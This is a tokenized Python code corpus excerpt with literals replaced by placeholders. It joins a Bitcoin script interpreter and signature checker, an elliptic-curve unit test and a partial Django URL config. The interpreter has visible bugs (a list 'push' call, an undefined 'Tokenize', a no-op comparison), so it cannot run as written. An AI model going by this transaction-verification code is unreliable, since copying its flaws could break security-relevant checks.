self . sql_select + '<STR_LIT>' , ( txid_hint , ) ) <EOL> for row in cursor . fetchall ( ) : <EOL> ( vl , txn ) = protocol . Txn . parse ( row [ <NUM_LIT:2> ] ) <EOL> if txn . hash == txid : <EOL> return Transaction ( self , row , txn ) <EOL> n //= <NUM_LIT:2> <EOL> new_n = self . load_n ( ) <EOL> if new_n != self . _N : <EOL> self . _N = new_n <EOL> return self . 
_get ( txid ) <EOL> return default </s>
<s> import inspect <EOL> import struct <EOL> from . bytevector import ByteVector <EOL> from . import opcodes <EOL> from . . import coins <EOL> from . . import protocol <EOL> from . . import util <EOL> from . . protocol import format <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> Zero = ByteVector . from_value ( <NUM_LIT:0> ) <EOL> One = ByteVector . from_value ( <NUM_LIT:1> ) <EOL> def _is_pubkey ( opcode , bytes , data ) : <EOL> if opcode != Tokenizer . OP_LITERAL : <EOL> return False <EOL> if len ( data ) != <NUM_LIT> or data [ <NUM_LIT:0> ] != chr ( <NUM_LIT> ) : <EOL> return False <EOL> return True <EOL> def _is_hash160 ( opcode , bytes , data ) : <EOL> if opcode != Tokenizer . OP_LITERAL : <EOL> return False <EOL> if len ( data ) != <NUM_LIT:20> : <EOL> return False <EOL> return True <EOL> def _is_hash256 ( opcode , bytes , data ) : <EOL> if opcode != Tokenizer . OP_LITERAL : <EOL> return False <EOL> if len ( data ) != <NUM_LIT:32> : <EOL> return False <EOL> return True <EOL> def _too_long ( opcode , bytes , data ) : <EOL> return False <EOL> SCRIPT_FORM_NON_STANDARD = '<STR_LIT>' <EOL> SCRIPT_FORM_PAY_TO_PUBKEY_HASH = '<STR_LIT>' <EOL> SCRIPT_FORM_PAY_TO_PUBKEY = '<STR_LIT>' <EOL> SCRIPT_FORM_UNSPENDABLE = '<STR_LIT>' <EOL> SCRIPT_FORM_ANYONE_CAN_SPEND = '<STR_LIT>' <EOL> SCRIPT_FORM_TRANSACTION_PUZZLE_HASH256 = '<STR_LIT>' <EOL> STANDARD_SCRIPT_FORMS = [ <EOL> SCRIPT_FORM_PAY_TO_PUBKEY_HASH , <EOL> SCRIPT_FORM_PAY_TO_PUBKEY <EOL> ] <EOL> TEMPLATE_PAY_TO_PUBKEY_HASH = ( lambda t : len ( t ) == <NUM_LIT:5> , opcodes . OP_DUP , <EOL> opcodes . OP_HASH160 , _is_hash160 , opcodes . OP_EQUALVERIFY , <EOL> opcodes . OP_CHECKSIG ) <EOL> TEMPLATE_PAY_TO_PUBKEY = ( lambda t : len ( t ) == <NUM_LIT:2> , _is_pubkey , <EOL> opcodes . 
OP_CHECKSIG ) <EOL> Templates = [ <EOL> ( SCRIPT_FORM_PAY_TO_PUBKEY_HASH , TEMPLATE_PAY_TO_PUBKEY_HASH ) , <EOL> ( SCRIPT_FORM_PAY_TO_PUBKEY , TEMPLATE_PAY_TO_PUBKEY ) , <EOL> ] <EOL> def _stack_op ( stack , func ) : <EOL> '''<STR_LIT>''' <EOL> count = len ( inspect . getargspec ( func ) . args ) <EOL> if len ( stack ) < count : return False <EOL> args = stack [ - count : ] <EOL> stack [ - count : ] = [ ] <EOL> for item in func ( * args ) : <EOL> stack . append ( item ) <EOL> return True <EOL> def _math_op ( stack , func , check_overflow = True ) : <EOL> '''<STR_LIT>''' <EOL> count = len ( inspect . getargspec ( func ) . args ) <EOL> if len ( stack ) < count : return False <EOL> args = stack [ - count : ] <EOL> stack [ - count : ] = [ ] <EOL> if check_overflow : <EOL> for arg in args : <EOL> if len ( arg ) > <NUM_LIT:4> : return False <EOL> result = func ( * args ) <EOL> if result == True : <EOL> result = One <EOL> elif result == False : <EOL> result = Zero <EOL> if result is not None : <EOL> stack . append ( result ) <EOL> return True <EOL> def _hash_op ( stack , func ) : <EOL> '''<STR_LIT>''' <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> value = func ( stack . pop ( ) . vector ) <EOL> stack . append ( ByteVector ( value ) ) <EOL> return True <EOL> def check_signature ( signature , public_key , hash_type , subscript , transaction , input_index ) : <EOL> if hash_type == <NUM_LIT:0> : <EOL> hash_type = ord ( signature [ - <NUM_LIT:1> ] ) <EOL> if hash_type != ord ( signature [ - <NUM_LIT:1> ] ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> signature = signature [ : - <NUM_LIT:1> ] <EOL> if ( hash_type & <NUM_LIT> ) == <NUM_LIT> or hash_type == <NUM_LIT:0> : <EOL> tx_ins = [ ] <EOL> for ( index , tx_in ) in enumerate ( transaction . inputs ) : <EOL> script = '<STR_LIT>' <EOL> if index == input_index : <EOL> script = subscript <EOL> tx_in = protocol . TxnIn ( tx_in . previous_output , script , tx_in . sequence ) <EOL> tx_ins . 
append ( tx_in ) <EOL> tx_outs = transaction . outputs <EOL> elif ( hash_type & <NUM_LIT> ) == <NUM_LIT> : <EOL> tx_ins = [ ] <EOL> index = <NUM_LIT:0> <EOL> for tx_in in transaction . inputs : <EOL> script = '<STR_LIT>' <EOL> sequence = <NUM_LIT:0> <EOL> if index == input_index : <EOL> script = subscript <EOL> sequence = tx_in . sequence <EOL> index += <NUM_LIT:1> <EOL> tx_in = protocol . TxnIn ( tx_in . previous_output , script , sequence ) <EOL> tx_ins . append ( tx_in ) <EOL> tx_outs = [ ] <EOL> elif ( hash_type & <NUM_LIT> ) == <NUM_LIT> : <EOL> tx_ins = [ ] <EOL> index = <NUM_LIT:0> <EOL> for tx_in in transaction . inputs : <EOL> script = '<STR_LIT>' <EOL> sequence = <NUM_LIT:0> <EOL> if index == input_index : <EOL> script = subscript <EOL> sequence = tx_in . sequence <EOL> index += <NUM_LIT:1> <EOL> tx_in = protocol . TxnIn ( tx_in . previous_output , script , sequence ) <EOL> tx_ins . append ( tx_in ) <EOL> tx_outs = [ ] <EOL> index = <NUM_LIT:0> <EOL> for tx_out in transaction . outputs : <EOL> if len ( tx_outs ) > input_index : break <EOL> if index != input_index : <EOL> tx_out = protocol . TxnOut ( - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> tx_outs . append ( tx_out ) <EOL> index += <NUM_LIT:1> <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % hash_type ) <EOL> if ( hash_type & <NUM_LIT> ) == <NUM_LIT> : <EOL> tx_in = transaction . inputs [ input_index ] <EOL> tx_ins = [ protocol . TxnIn ( tx_in . previous_output , subscript , tx_in . sequence ) ] <EOL> tx_outs = transaction . outputs <EOL> tx_copy = FlexTxn ( transaction . version , tx_ins , tx_outs , transaction . lock_time ) <EOL> sig_hash = struct . pack ( '<STR_LIT>' , hash_type ) <EOL> payload = tx_copy . binary ( ) + sig_hash <EOL> return util . ecc . verify ( payload , public_key , signature ) <EOL> class FlexTxn ( protocol . Txn ) : <EOL> properties = [ <EOL> ( '<STR_LIT:version>' , format . FormatTypeNumber ( '<STR_LIT:I>' ) ) , <EOL> ( '<STR_LIT>' , format . FormatTypeArray ( format . 
FormatTypeTxnIn , <NUM_LIT:1> ) ) , <EOL> ( '<STR_LIT>' , format . FormatTypeArray ( format . FormatTypeTxnOut ) ) , <EOL> ( '<STR_LIT>' , format . FormatTypeNumber ( '<STR_LIT:I>' ) ) , <EOL> ] <EOL> class Tokenizer ( object ) : <EOL> '''<STR_LIT>''' <EOL> OP_LITERAL = <NUM_LIT> <EOL> def __init__ ( self , script , expand_verify = False ) : <EOL> self . _script = script <EOL> self . _expand_verify = expand_verify <EOL> self . _tokens = [ ] <EOL> self . _process ( script ) <EOL> def append ( self , script ) : <EOL> self . _script += script <EOL> self . _process ( script ) <EOL> def get_subscript ( self , start_index = <NUM_LIT:0> , filter = None ) : <EOL> '''<STR_LIT>''' <EOL> output = '<STR_LIT>' <EOL> for ( opcode , bytes , value ) in self . _tokens [ start_index : ] : <EOL> if filter and not filter ( opcode , bytes , value ) : <EOL> continue <EOL> output += bytes <EOL> return output <EOL> def match_template ( self , template ) : <EOL> '<STR_LIT>' <EOL> if not template [ <NUM_LIT:0> ] ( self ) : <EOL> return False <EOL> for ( ( o , b , v ) , t ) in zip ( self . _tokens , template [ <NUM_LIT:1> : ] ) : <EOL> if callable ( t ) : <EOL> if not t ( o , b , v ) : <EOL> return False <EOL> elif t != o : <EOL> return False <EOL> return True <EOL> _Verify = { <EOL> opcodes . OP_EQUALVERIFY : opcodes . OP_EQUAL , <EOL> opcodes . OP_NUMEQUALVERIFY : opcodes . OP_NUMEQUAL , <EOL> opcodes . OP_CHECKSIGVERIFY : opcodes . OP_CHECKSIG , <EOL> opcodes . OP_CHECKMULTISIGVERIFY : opcodes . OP_CHECKMULTISIG , <EOL> } <EOL> def _process ( self , script ) : <EOL> '<STR_LIT>' <EOL> while script : <EOL> opcode = ord ( script [ <NUM_LIT:0> ] ) <EOL> bytes = script [ <NUM_LIT:0> ] <EOL> script = script [ <NUM_LIT:1> : ] <EOL> value = None <EOL> verify = False <EOL> if opcode == opcodes . OP_0 : <EOL> value = Zero <EOL> opcode = Tokenizer . OP_LITERAL <EOL> elif <NUM_LIT:1> <= opcode <= <NUM_LIT> : <EOL> length = opcode <EOL> if opcodes . OP_PUSHDATA1 <= opcode <= opcodes . 
OP_PUSHDATA4 : <EOL> op_length = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] [ opcode - opcodes . OP_PUSHDATA1 ] <EOL> format = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] [ opcode - opcodes . OP_PUSHDATA1 ] <EOL> length = struct . unpack ( format , script [ : op_length ] ) [ <NUM_LIT:0> ] <EOL> bytes += script [ : op_length ] <EOL> script = script [ op_length : ] <EOL> value = ByteVector ( vector = script [ : length ] ) <EOL> bytes += script [ : length ] <EOL> script = script [ length : ] <EOL> if len ( value ) != length : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> opcode = Tokenizer . OP_LITERAL <EOL> elif opcode == opcodes . OP_1NEGATE : <EOL> opcode = Tokenizer . OP_LITERAL <EOL> value = ByteVector . from_value ( - <NUM_LIT:1> ) <EOL> elif opcode == opcodes . OP_TRUE : <EOL> opcode = Tokenizer . OP_LITERAL <EOL> value = ByteVector . from_value ( <NUM_LIT:1> ) <EOL> elif opcodes . OP_1 <= opcode <= opcodes . OP_16 : <EOL> value = ByteVector . from_value ( opcode - opcodes . OP_1 + <NUM_LIT:1> ) <EOL> opcode = Tokenizer . OP_LITERAL <EOL> elif self . _expand_verify and opcode in self . _Verify : <EOL> opcode = self . _Verify [ opcode ] <EOL> verify = True <EOL> self . _tokens . append ( ( opcode , bytes , value ) ) <EOL> if verify : <EOL> self . _tokens . append ( ( opcodes . OP_VERIFY , '<STR_LIT>' , None ) ) <EOL> def get_bytes ( self , index ) : <EOL> '<STR_LIT>' <EOL> return self . _tokens [ index ] [ <NUM_LIT:1> ] <EOL> def get_value ( self , index ) : <EOL> '<STR_LIT>' <EOL> return self . _tokens [ index ] [ <NUM_LIT:2> ] <EOL> def __len__ ( self ) : <EOL> return len ( self . _tokens ) <EOL> def __getitem__ ( self , name ) : <EOL> return self . _tokens [ name ] [ <NUM_LIT:0> ] <EOL> def __iter__ ( self ) : <EOL> for ( opcode , bytes , value ) in self . _tokens : <EOL> yield opcode <EOL> def __str__ ( self ) : <EOL> output = [ ] <EOL> for ( opcode , bytes , value ) in self . _tokens : <EOL> if opcode == Tokenizer . OP_LITERAL : <EOL> output . 
append ( value . vector . encode ( '<STR_LIT>' ) ) <EOL> else : <EOL> if bytes : <EOL> output . append ( opcodes . get_opcode_name ( ord ( bytes [ <NUM_LIT:0> ] ) ) ) <EOL> return "<STR_LIT:U+0020>" . join ( output ) <EOL> class Script ( object ) : <EOL> def __init__ ( self , transaction , coin = coins . Bitcoin ) : <EOL> self . _transaction = transaction <EOL> self . _coin = coin <EOL> @ property <EOL> def output_count ( self ) : <EOL> return len ( self . _transaction . outputs ) <EOL> def output_address ( self , output_index ) : <EOL> pk_script = self . _transaction . outputs [ output_index ] . pk_script <EOL> tokens = Tokenizer ( pk_script ) <EOL> if tokens . match_template ( TEMPLATE_PAY_TO_PUBKEY_HASH ) : <EOL> pubkeyhash = tokens . get_value ( <NUM_LIT:2> ) . vector <EOL> return util . key . pubkeyhash_to_address ( pubkeyhash , self . _coin . address_version ) <EOL> if tokens . match_template ( TEMPLATE_PAY_TO_PUBKEY ) : <EOL> pubkey = tokens . get_value ( <NUM_LIT:0> ) . vector <EOL> return util . key . publickey_to_address ( pubkey , self . _coin . address_version ) <EOL> return None <EOL> def script_form ( self , output_index ) : <EOL> pk_script = self . _transaction . outputs [ output_index ] . pk_script <EOL> tokens = Tokenizer ( pk_script ) <EOL> for ( sf , template ) in Templates : <EOL> if tokens . match_template ( template ) : <EOL> return sf <EOL> return SCRIPT_FORM_NON_STANDARD <EOL> def is_standard_script ( self , output_index ) : <EOL> pk_script = self . _transaction . outputs [ output_index ] <EOL> tokens = Tokenize ( pk_script , expand_verify = False ) <EOL> for sf in STANDARD_SCRIPT_FORMS : <EOL> if tokens . match_template ( Templates [ sf ] ) : <EOL> return True <EOL> return False <EOL> @ property <EOL> def input_count ( self ) : <EOL> return len ( self . _transaction . inputs ) <EOL> def verify_input ( self , input_index , pk_script ) : <EOL> input = self . _transaction . inputs [ input_index ] <EOL> return self . process ( input . 
signature_script , pk_script , self . _transaction , input_index ) <EOL> def verify ( self ) : <EOL> '''<STR_LIT>''' <EOL> for i in xrange ( <NUM_LIT:0> , len ( self . _transaction . inputs ) ) : <EOL> if self . _transaction . index == <NUM_LIT:0> and i == <NUM_LIT:0> : continue <EOL> input = self . _transaction . inputs [ i ] <EOL> previous_output = self . _transaction . previous_output ( i ) <EOL> if not self . verify_input ( i , previous_output . pk_script ) : <EOL> return False <EOL> return True <EOL> @ staticmethod <EOL> def process ( signature_script , pk_script , transaction , input_index , hash_type = <NUM_LIT:0> ) : <EOL> tokens = Tokenizer ( signature_script , expand_verify = True ) <EOL> signature_length = len ( tokens ) <EOL> tokens . append ( pk_script ) <EOL> last_codeseparator = signature_length <EOL> for token in tokens : <EOL> if token in ( opcodes . OP_VERIF , opcodes . OP_VERNOTIF ) : <EOL> return False <EOL> ifstack = [ ] <EOL> stack = [ ] <EOL> altstack = [ ] <EOL> for pc in xrange ( <NUM_LIT:0> , len ( tokens ) ) : <EOL> opcode = tokens [ pc ] <EOL> if opcode == opcodes . OP_IF : <EOL> ifstack . append ( stack . pop ( ) . value != <NUM_LIT:0> ) <EOL> elif opcode == opcodes . OP_NOTIF : <EOL> ifstack . append ( stack . pop ( ) . value == <NUM_LIT:0> ) <EOL> elif opcode == opcodes . OP_ELSE : <EOL> if len ( ifstack ) == <NUM_LIT:0> : return False <EOL> ifstack . push ( not ifstack . pop ( ) ) <EOL> elif opcode == opcodes . OP_ENDIF : <EOL> if len ( ifstack ) == <NUM_LIT:0> : return False <EOL> ifstack . pop ( ) <EOL> if False in ifstack : continue <EOL> if opcode == Tokenizer . OP_LITERAL : <EOL> stack . append ( tokens . get_value ( pc ) ) <EOL> elif opcode == opcodes . OP_NOP : <EOL> pass <EOL> elif opcode == opcodes . OP_VERIFY : <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> if bool ( stack [ - <NUM_LIT:1> ] ) : <EOL> stack . pop ( ) <EOL> else : <EOL> return False <EOL> elif opcode == opcodes . 
OP_RETURN : <EOL> return False <EOL> elif opcode == opcodes . OP_TOALTSTACK : <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> altstack . append ( stack . pop ( ) ) <EOL> elif opcode == opcodes . OP_FROMALTSTACK : <EOL> if len ( altstack ) < <NUM_LIT:1> : return False <EOL> stack . append ( altstack . pop ( ) ) <EOL> elif opcode == opcodes . OP_IFDUP : <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> if bool ( stack [ - <NUM_LIT:1> ] ) : <EOL> stack . append ( stack [ - <NUM_LIT:1> ] ) <EOL> elif opcode == opcodes . OP_DEPTH : <EOL> stack . append ( ByteVector . from_value ( len ( stack ) ) ) <EOL> elif opcode == opcodes . OP_DROP : <EOL> if not _stack_op ( stack , lambda x : [ ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_DUP : <EOL> if not _stack_op ( stack , lambda x : [ x , x ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NIP : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_OVER : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x1 , x2 , x1 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_PICK : <EOL> if len ( stack ) < <NUM_LIT:2> : return False <EOL> n = stack . pop ( ) . value + <NUM_LIT:1> <EOL> if not ( <NUM_LIT:0> <= n <= len ( stack ) ) : return False <EOL> stack . append ( stack [ - n ] ) <EOL> elif opcode == opcodes . OP_ROLL : <EOL> if len ( stack ) < <NUM_LIT:2> : return False <EOL> n = stack . pop ( ) . value + <NUM_LIT:1> <EOL> if not ( <NUM_LIT:0> <= n <= len ( stack ) ) : return False <EOL> stack . append ( stack . pop ( - n ) ) <EOL> elif opcode == opcodes . OP_ROT : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 : [ x2 , x3 , x1 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_SWAP : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x2 , x1 ] ) : <EOL> return False <EOL> elif opcode == opcodes . 
OP_TUCK : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x2 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2DROP : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2DUP : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x1 , x2 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_3DUP : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 : [ x1 , x2 , x3 , x1 , x2 , x3 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2OVER : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 , x4 : [ x1 , x2 , x3 , x4 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2ROT : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 , x4 , x5 , x6 : [ x3 , x4 , x5 , x6 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2SWAP : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 , x4 : [ x3 , x4 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_SIZE : <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> stack . append ( ByteVector . from_value ( len ( stack [ - <NUM_LIT:1> ] ) ) ) <EOL> elif opcode == opcodes . OP_EQUAL : <EOL> if not _math_op ( stack , lambda x1 , x2 : bool ( x1 == x2 ) , False ) : <EOL> return False <EOL> elif opcode == opcodes . OP_1ADD : <EOL> if not _math_op ( stack , lambda a : a + One ) : <EOL> return False <EOL> elif opcode == opcodes . OP_1SUB : <EOL> if not _math_op ( stack , lambda a : a - One ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NEGATE : <EOL> if not _math_op ( stack , lambda a : - a ) : <EOL> return False <EOL> elif opcode == opcodes . OP_ABS : <EOL> if not _math_op ( stack , lambda a : abs ( a ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NOT : <EOL> if not _math_op ( stack , lambda a : bool ( a == <NUM_LIT:0> ) ) : <EOL> return False <EOL> elif opcode == opcodes . 
OP_0NOTEQUAL : <EOL> if not _math_op ( stack , lambda a : bool ( a != <NUM_LIT:0> ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_ADD : <EOL> if not _math_op ( stack , lambda a , b : a + b ) : <EOL> return False <EOL> elif opcode == opcodes . OP_SUB : <EOL> if not _math_op ( stack , lambda a , b : a - b ) : <EOL> return False <EOL> elif opcode == opcodes . OP_BOOLAND : <EOL> if not _math_op ( stack , lambda a , b : bool ( a and b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_BOOLOR : <EOL> if not _math_op ( stack , lambda a , b : bool ( a or b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NUMEQUAL : <EOL> if not _math_op ( stack , lambda a , b : bool ( a == b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NUMNOTEQUAL : <EOL> if not _math_op ( stack , lambda a , b : bool ( a != b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_LESSTHAN : <EOL> if not _math_op ( stack , lambda a , b : bool ( a < b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_GREATERTHAN : <EOL> if not _math_op ( stack , lambda a , b : bool ( a > b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_LESSTHANOREQUAL : <EOL> if not _math_op ( stack , lambda a , b : bool ( a <= b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_GREATERTHANOREQUAL : <EOL> if not _math_op ( stack , lambda a , b : bool ( a >= b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_MIN : <EOL> if not _math_op ( stack , lambda a , b : min ( a , b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_MAX : <EOL> if not _math_op ( stack , lambda a , b : max ( a , b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_WITHIN : <EOL> if not _math_op ( stack , lambda x , omin , omax : bool ( omin <= x < omax ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_RIPEMD160 : <EOL> if not _hash_op ( stack , util . ripemd160 ) : <EOL> return False <EOL> elif opcode == opcodes . 
OP_SHA1 : <EOL> if not _hash_op ( stack , util . sha1 ) : <EOL> return False <EOL> elif opcode == opcodes . OP_SHA256 : <EOL> if not _hash_op ( stack , util . sha256 ) : <EOL> return False <EOL> elif opcode == opcodes . OP_HASH160 : <EOL> if not _hash_op ( stack , util . hash160 ) : <EOL> return False <EOL> elif opcode == opcodes . OP_HASH256 : <EOL> if not _hash_op ( stack , util . sha256d ) : <EOL> return False <EOL> elif opcode == opcodes . OP_CODESEPARATOR : <EOL> if pc > last_codeseparator : <EOL> last_codeseparator = pc <EOL> elif opcode == opcodes . OP_CHECKSIG : <EOL> if len ( stack ) < <NUM_LIT:2> : return False <EOL> def filter ( opcode , bytes , value ) : <EOL> if opcode == opcodes . OP_CODESEPARATOR : <EOL> return False <EOL> if opcode == Tokenizer . OP_LITERAL and isinstance ( value , str ) and value == signature : <EOL> return False <EOL> return True <EOL> subscript = tokens . get_subscript ( last_codeseparator , filter ) <EOL> public_key = stack . pop ( ) . vector <EOL> signature = stack . pop ( ) . vector <EOL> valid = check_signature ( signature , public_key , hash_type , subscript , transaction , input_index ) <EOL> if valid : <EOL> stack . append ( One ) <EOL> else : <EOL> stack . append ( Zero ) <EOL> elif opcode == opcodes . OP_CHECKMULTISIG : <EOL> if len ( stack ) < <NUM_LIT:2> : return False <EOL> count = stack . pop ( ) . value <EOL> if len ( stack ) < count : return False <EOL> public_keys = [ stack . pop ( ) for i in xrange ( count ) ] <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> count = stack . pop ( ) . value <EOL> if len ( stack ) < count : return False <EOL> signatures = [ stack . pop ( ) for i in xrange ( count ) ] <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> stack . pop ( ) <EOL> def filter ( opcode , bytes , value ) : <EOL> if opcode == opcodes . OP_CODESEPARATOR : <EOL> return False <EOL> if opcode == Tokenizer . 
OP_LITERAL and isinstance ( value , str ) and value in signatures : <EOL> return False <EOL> return True <EOL> subscript = tokens . get_subscript ( last_codeseparator , filter ) <EOL> matched = dict ( ) <EOL> for signature in signatures : <EOL> for public_key in public_keys : <EOL> if check_signature ( signature , public_key , hash_type , subscript , transaction , input_index ) : <EOL> break <EOL> else : <EOL> public_key is None <EOL> if public_key is not None : <EOL> matched [ signature ] = public_key <EOL> public_keys . remove ( public_key ) <EOL> if len ( matched ) == len ( signatures ) : <EOL> stack . append ( One ) <EOL> else : <EOL> stack . append ( Zero ) <EOL> elif opcode == opcodes . OP_RESERVED : <EOL> return False <EOL> elif opcode == opcodes . OP_VER : <EOL> return False <EOL> elif opcode == opcodes . OP_RESERVED1 : <EOL> return False <EOL> elif opcode == opcodes . OP_RESERVED2 : <EOL> return False <EOL> elif opcodes . OP_NOP1 <= opcode <= opcodes . OP_NOP10 : <EOL> pass <EOL> else : <EOL> return False <EOL> if len ( stack ) and bool ( stack [ - <NUM_LIT:1> ] ) : <EOL> return True <EOL> return False </s>
<s> import unittest <EOL> import pycoind <EOL> class TestEllipticCurveCrypto ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def test_shared_secret ( self ) : <EOL> a = pycoind . wallet . Address . generate ( ) <EOL> b = pycoind . wallet . Address . generate ( ) <EOL> secret_ab = pycoind . util . ecc . shared_secret ( a . public_key , b . private_key ) <EOL> secret_ba = pycoind . util . ecc . shared_secret ( b . public_key , a . private_key ) <EOL> self . assertTrue ( secret_ab == secret_ba ) <EOL> suite = unittest . TestLoader ( ) . loadTestsFromTestCase ( TestEllipticCurveCrypto ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf . urls . defaults import * <EOL> import django . views . defaults <EOL> from django . views . generic . base import RedirectView <EOL> from codereview import feeds <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT:index>' ) , <EOL> ( r'<STR_LIT>' , RedirectView . as_view ( url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> RedirectView . as_view ( url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT:image>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> django . views . defaults . page_not_found , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> django . views . defaults . 
page_not_found , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT:description>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> 